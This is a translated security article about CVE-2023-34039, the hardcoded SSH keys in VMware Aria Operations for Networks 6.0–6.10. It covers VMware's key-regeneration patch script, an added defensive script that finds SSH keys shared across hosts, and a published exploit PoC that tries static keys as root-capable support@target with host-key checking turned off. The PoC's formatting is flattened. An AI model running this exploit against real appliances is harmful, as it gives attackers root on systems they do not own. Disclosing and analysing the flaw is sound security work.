VMware Aria【CVE-2023-34039】Exploit PoC

admin · 2024-08-07 22:45:44 · 27 views · 4,235 characters · 14 min 7 sec read

Background

Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. VMware has evaluated the severity of this issue to be in the critical severity range with a maximum CVSSv3 base score of 9.8 (CVE-2023-34039).

Security researchers Harsh Jaiswal (@rootxharsh) and Rahul Maini (@iamnoooob) of ProjectDiscovery reported the vulnerability to VMware.

VMware also notes:

A malicious actor with network access to Aria Operations for Networks can bypass SSH authentication to gain access to the Aria Operations for Networks CLI.

Interestingly, VMware classifies this as a "network authentication bypass", but in the original author's view nothing is actually bypassed: SSH authentication is fully in place, VMware simply forgot to regenerate the keys.

After reading these two descriptions, the original author realized this had to be a hardcoded SSH key issue: VMware's Aria Operations for Networks shipped hardcoded keys from version 6.0 through 6.10.

Patch Analysis

VMware has released several patch files for users to apply to their instances. Among the many files in these patches is a bash script.

refresh_ssh_keys() {
    log "Remove old public key from authorized_keys file for support user"
    chmod 666 /home/support/.ssh/authorized_keys
    sed -i "s#$(sudo cat /home/support/.ssh/id_rsa_vnera_keypair.pub)##" /home/support/.ssh/authorized_keys

    log "Remove old keys"
    rm -f /home/support/.ssh/id_rsa_vnera_keypair
    rm -f /home/support/.ssh/id_rsa_vnera_keypair.pub
    rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair
    rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub

    log "Generate new keypair for support user"
    ssh-keygen -q -t rsa -f /home/support/.ssh/id_rsa_vnera_keypair -N ''

    log "Copy new keys for ubuntu user"
    cp /home/support/.ssh/id_rsa_vnera_keypair /home/ubuntu/.ssh/
    cp /home/support/.ssh/id_rsa_vnera_keypair.pub /home/ubuntu/.ssh/

    log "Add new public key file to home/support/.ssh/authorized_keys"
    cat /home/support/.ssh/id_rsa_vnera_keypair.pub >> /home/support/.ssh/authorized_keys
    chown support:support /home/support/.ssh/authorized_keys

    log "Provide right permissions to ssh files generated"
    chmod 400 /home/support/.ssh/id_rsa_vnera_keypair
    chmod 400 /home/support/.ssh/id_rsa_vnera_keypair.pub
    chmod 640 /home/support/.ssh/authorized_keys
    chown support:support /home/support/.ssh/id_rsa_vnera_keypair
    chown support:support /home/support/.ssh/id_rsa_vnera_keypair.pub

    chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair
    chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub
    chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair
    chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub

    log "Remove Empty Lines from authorized_keys files"
    sed -i '/^$/d' /home/support/.ssh/authorized_keys
}



As can be seen, the refresh_ssh_keys function is responsible for replacing the current SSH keys of the support and ubuntu users. Notably, both users hold the same key pair, and both are sudoers with no restrictions, so whoever holds the private key gets root on the appliance.
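The defect the patch repairs is a property that can be audited directly: a key pair that is supposed to be generated per instance must never show up on two independent hosts. The following is an added example written for this page, not code from the original post, from Summoning Team or from VMware. It fingerprints authorized_keys entries the way `ssh-keygen -lf` does (SHA256 over the decoded wire-format key blob, base64 without padding) and reports any fingerprint present on more than one host, which is exactly the pattern a fleet of pre-6.11 appliances would have shown for the support user. The host names, the toy RSA moduli and the Ed25519 bytes are constructed for the example and are not real keys.

```python
"""Flag SSH public keys that appear on more than one host.

Added example for this page (not from the original post, Summoning Team or VMware).
A per-instance key found on two independent hosts means key generation was not
unique, which is the root cause VMware describes for CVE-2023-34039. Fingerprints
are computed exactly as `ssh-keygen -lf` prints them. All host names and key
material in SAMPLE_HOSTS are constructed toy values.
"""
from __future__ import annotations

import base64
import hashlib
import shlex
import struct
from collections import defaultdict
from typing import Iterable, Optional

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com")


def _ssh_string(b: bytes) -> bytes:
    """RFC 4251 string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _ssh_mpint(n: int) -> bytes:
    """RFC 4251 mpint for a positive integer (leading 0x00 when the top bit is set)."""
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def make_rsa_pub_line(e: int, n: int, comment: str) -> str:
    """Build an authorized_keys line from RSA (e, n); used here only to construct sample data."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def _blob_type(blob: bytes) -> Optional[str]:
    """Key type string embedded at the start of the wire-format blob, or None if truncated."""
    if len(blob) < 4:
        return None
    (length,) = struct.unpack(">I", blob[:4])
    if len(blob) < 4 + length:
        return None
    return blob[4:4 + length].decode("ascii", "replace")


def fingerprint(authorized_keys_line: str) -> Optional[str]:
    """SHA256 fingerprint in `ssh-keygen -lf` format, or None for blank, comment or malformed lines.
    Tolerates a leading options field such as from="10.0.0.5" (hence shlex, not str.split)."""
    line = authorized_keys_line.strip()
    if not line or line.startswith("#"):
        return None
    try:
        fields = shlex.split(line)
    except ValueError:  # unbalanced quotes in the options field
        return None
    # the key type is the first field, or the second when an options field precedes it
    for i in range(min(2, len(fields) - 1)):
        if fields[i] not in KEY_TYPES:
            continue
        try:
            blob = base64.b64decode(fields[i + 1], validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
        if _blob_type(blob) != fields[i]:
            return None  # declared type and the type inside the blob disagree
        digest = hashlib.sha256(blob).digest()
        return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return None


def shared_keys(hosts: dict[str, str], ignore: Iterable[str] = ()) -> dict[str, list[str]]:
    """Map fingerprint -> sorted host list for every fingerprint found on more than one host.
    `hosts` maps host name -> authorized_keys content collected from it; `ignore` lists
    fingerprints that are deliberately shared (e.g. an operator's own key)."""
    skip = set(ignore)
    seen: dict[str, set[str]] = defaultdict(set)
    for host, content in hosts.items():
        for line in content.splitlines():
            fp = fingerprint(line)
            if fp and fp not in skip:
                seen[fp].add(host)
    return {fp: sorted(on) for fp, on in seen.items() if len(on) > 1}


# Constructed sample data. Real RSA moduli are 2048 bits or more; these short values
# exist only so the example runs offline and must not be mistaken for real keys.
STATIC_N = 0xC0FFEE00DEADBEEF0BADF00DFEEDFACECAFEBABE12345677
UNIQUE_N = 0xDECAFBADABCDEF01234567890F1E2D3C4B5A69788796A5B5
STATIC_LINE = make_rsa_pub_line(65537, STATIC_N, "support@vnera")  # identical on every appliance
UNIQUE_LINE = make_rsa_pub_line(65537, UNIQUE_N, "support@vnera")  # regenerated per instance
_ED_BLOB = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))  # toy Ed25519 public key
ADMIN_LINE = 'from="10.0.0.5" ssh-ed25519 ' + base64.b64encode(_ED_BLOB).decode() + " ops@jumphost"

SAMPLE_HOSTS = {
    "platform-01": STATIC_LINE + "\n" + ADMIN_LINE + "\n",
    "collector-01": "# support user\n" + STATIC_LINE + "\n",
    "platform-02-patched": UNIQUE_LINE + "\n\n",
}

if __name__ == "__main__":
    for fp, on_hosts in shared_keys(SAMPLE_HOSTS).items():
        print(f"{fp} present on {len(on_hosts)} hosts: {', '.join(on_hosts)}")
```

Run against real data by reading /home/support/.ssh/authorized_keys from each appliance into the `hosts` mapping; the fingerprints match what `ssh-keygen -lf` prints, so a hit can be cross-checked on the box. Keys you deploy on purpose (an operator's jump-host key) will also be reported, which is what the `ignore` parameter is for.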

Hunting for the 'Keys'

The main challenge in exploiting this vulnerability is that each version of VMware Aria Operations for Networks carries its own unique SSH key, so building a fully functional exploit requires collecting the keys from every version of the product. After some time, the original author managed to collect all keys for versions 6.0 through 6.10. The latest version, 6.11, is not affected, because VMware fixed the issue before its release.

The product is deployed as two nodes, one called Platform and the other called Collector, essentially two different machines; the exploit includes the keys for both node types across all versions.

PoC Demonstration

A video demonstration is available in the original article (linked below).

PoC Code

The code has been published on GitHub.

"""

VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

Version: All versions from 6.0 to 6.10

Discovered by: Harsh Jaiswal (@rootxharsh) and Rahul Maini (@iamnoooob) at ProjectDiscovery Research

Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

A root cause analysis of the vulnerability can be found on my blog:

https://summoning.team/blog/vmware-vrealize-network-insight-ssh-key-rce-cve-2023-34039/

"""

import argparse

import os

import subprocess

 

parser = argparse.ArgumentParser()

parser.add_argument('--target', '-t', help='Target IP address (192.168.1.1)', required=True)

parser.add_argument('--port', '-p', help='Target SSH Port', default='22', required=False)

args = parser.parse_args()

 

print("""(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

 

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

""")

 

def sanity_check():

if os.name == 'posix':

os.system('chmod -R 700 keys/')

 

def exploit():

for root, dirs, files in os.walk("keys"):

for file in files:

key_file = str(os.path.join(root, file))

print(f"(*) Trying key: {key_file}n")

ssh_command = ['ssh', '-i', key_file, 'support@' + args.target, '-p', args.port, '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'BatchMode=yes', '2>/dev/null']

try:

ssh_command = ' '.join(ssh_command)

coutput = os.system(ssh_command)

except Exception as e:

log = f"(-) Failed connecting to {args.target}:{args.port} with key {key_file}!"

continue

sanity_check()

exploit()



Original source: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

Translated and compiled by 骨哥 (Guge).

Originally published on the WeChat public account 骨哥说事: Researchers publish VMware Aria【CVE-2023-34039】exploit PoC

Reproduction should retain the link to this article (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2002370.html
